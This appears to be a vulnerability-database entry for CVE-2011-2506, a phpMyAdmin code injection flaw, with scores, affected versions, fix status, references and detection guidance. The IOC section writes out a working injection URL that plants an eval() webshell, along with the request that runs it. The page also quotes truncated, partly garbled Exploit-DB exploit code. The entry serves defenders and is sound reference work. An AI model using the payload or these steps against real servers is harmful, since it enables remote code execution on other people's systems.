CVE-2011-2506
Published 2011-07-14
Priority P3 · 55 · high · CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
EXPLOIT
EPSS 9.63% (94.9th percentile)
setup/lib/ConfigGenerator.class.php in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1 does not properly restrict the presence of comment closing delimiters, which allows remote attackers to conduct static code injection attacks by leveraging the ability to modify the SESSION superglobal array.
Affected
41 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | phpmyadmin | < phpmyadmin 4:3.4.3.1-1 (bookworm) | phpmyadmin 4:3.4.3.1-1 (bookworm) |
| phpmyadmin | phpmyadmin | — | — |
Detection & IOCs
url: `/?_SESSION[ConfigFile][Servers][*/foreach($_GET as $k=>$v)if($k==="eval")eval($v);/*][port]=0&session_to_unset=x&token=<token>`
- Detect exploitation attempts by monitoring HTTP requests containing '_SESSION[ConfigFile][Servers][*/' in the query string, which is the session poisoning vector used to inject PHP code between comment delimiters.
- Alert on POST requests to /setup/config.php with the parameter 'submit_save=Save', which triggers writing the injected code to the config file on disk.
- Alert on GET requests to /config/config.inc.php with an 'eval' query parameter, which is the webshell execution step after successful code injection.
- Presence of the MD5 hash 202cb962ac59075b964b07152d234b70 (md5(123)) in HTTP responses from /config/config.inc.php is a reliable indicator of successful code injection exploitation.
- Monitor for creation or modification of the file config/config.inc.php within the phpMyAdmin web root, as the exploit writes injected PHP code to this path.
- The exploit requires the 'config' directory to be web-server writable; absence of this directory causes the exploit to abort. Monitor for creation of this directory as a pre-exploitation indicator.
- Exploitation requires the web server to have write access to the 'config/' subdirectory within the phpMyAdmin installation. If this directory does not exist or is not writable, the exploit will fail.
- Affected versions are phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1; versions at or above these are patched.
CVSS provenance
nvd · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
osv · 7.5 HIGH
vendor_debian · 7.5 LOW
GHSA
phpMyAdmin vulnerable to static code injection
ghsa·2022-05-14
CVE-2011-2506 [HIGH] CWE-94 phpMyAdmin vulnerable to static code injection
OSV
phpMyAdmin vulnerable to static code injection
osv·2022-05-14
CVE-2011-2506 [HIGH] phpMyAdmin vulnerable to static code injection
OSV
CVE-2011-2506: setup/lib/ConfigGenerator
osv·2011-07-14·CVSS 7.5
CVE-2011-2506 [HIGH] CVE-2011-2506: setup/lib/ConfigGenerator
Debian
CVE-2011-2506: phpmyadmin - setup/lib/ConfigGenerator.class.php in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x ...
vendor_debian·2011·CVSS 7.5
CVE-2011-2506 [HIGH] CVE-2011-2506: phpmyadmin - setup/lib/ConfigGenerator.class.php in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x ...
Scope: local
bookworm: resolved (fixed in 4:3.4.3.1-1)
bullseye: resolved (fixed in 4:3.4.3.1-1)
forky: resolved (fixed in 4:3.4.3.1-1)
sid: resolved (fixed in 4:3.4.3.1-1)
trixie: resolved (fixed in 4:3.4.3.1-1)
No detection rules found.
Exploit-DB
phpMyAdmin 3.x - Swekey Remote Code Injection
exploitdb·2011-07-09·CVSS 6.4
CVE-2011-2506 [MEDIUM] phpMyAdmin 3.x - Swekey Remote Code Injection
---
```php
if(php_sapi_name()==='cli'){
    if(!isset($argv[1])){
        output(" Usage\n ".$argv[0]." http://example.com/phpMyAdmin-3.3.9.2");
        killme();
    }
    $pmaurl = $argv[1];
}else{
    $pmaurl = iss
```
Exploit-DB
phpMyAdmin3 (pma3) - Remote Code Execution
exploitdb·2011-07-08·CVSS 6.4
CVE-2011-2506 [MEDIUM] phpMyAdmin3 (pma3) - Remote Code Execution
---
```python
#!/usr/bin/env python
# coding=utf-8
# pma3 - phpMyAdmin3 remote code execute exploit
# Author: wofeiwo
# Thx Superhei
# Tested on: 3.1.1, 3.2.1, 3.4.3
# CVE: CVE-2011-2505, CVE-2011-2506
# Date: 2011-07-08
# Have fun, DO *NOT* USE IT TO DO BAD THING.
################################################
# Requirements: 1. "config" directory must created&writeable in pma directory.
#               2. session.auto_start = 1 in php.ini configuration.
import os,sys,urllib2,re

def usage(program):
    print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code execute exploit"
    print "Usage: %s " % program
    print "Example: %s http://www.test.com/phpMyAdmin" % program
    sys.exit(0)

def main(args):
    try:
        if len(args) \(.*)\\", urllib2.urlopen(url).read())
        if len(result)
```
No writeups or analysis indexed.
- http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html
- http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062719.html
- http://phpmyadmin.git.sourceforge.net/git/gitweb.cgi?p=phpmyadmin/phpmyadmin%3Ba=commit%3Bh=0fbedaf5fd7a771d0885c6b7385d934fc90d0d7f
- http://secunia.com/advisories/45139
- http://secunia.com/advisories/45292
- http://secunia.com/advisories/45315
- http://securityreason.com/securityalert/8306
- http://typo3.org/teams/security/security-bulletins/typo3-sa-2011-008/
- http://www.debian.org/security/2011/dsa-2286
- http://www.exploit-db.com/exploits/17514/
- http://www.mandriva.com/security/advisories?name=MDVSA-2011:124
- http://www.openwall.com/lists/oss-security/2011/06/28/2
- http://www.openwall.com/lists/oss-security/2011/06/28/6
- http://www.openwall.com/lists/oss-security/2011/06/28/8
- http://www.openwall.com/lists/oss-security/2011/06/29/11
- http://www.osvdb.org/73612
- http://www.phpmyadmin.net/home_page/security/PMASA-2011-6.php
- http://www.securityfocus.com/archive/1/518804/100/0/threaded
- http://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt
Published: 2011-07-14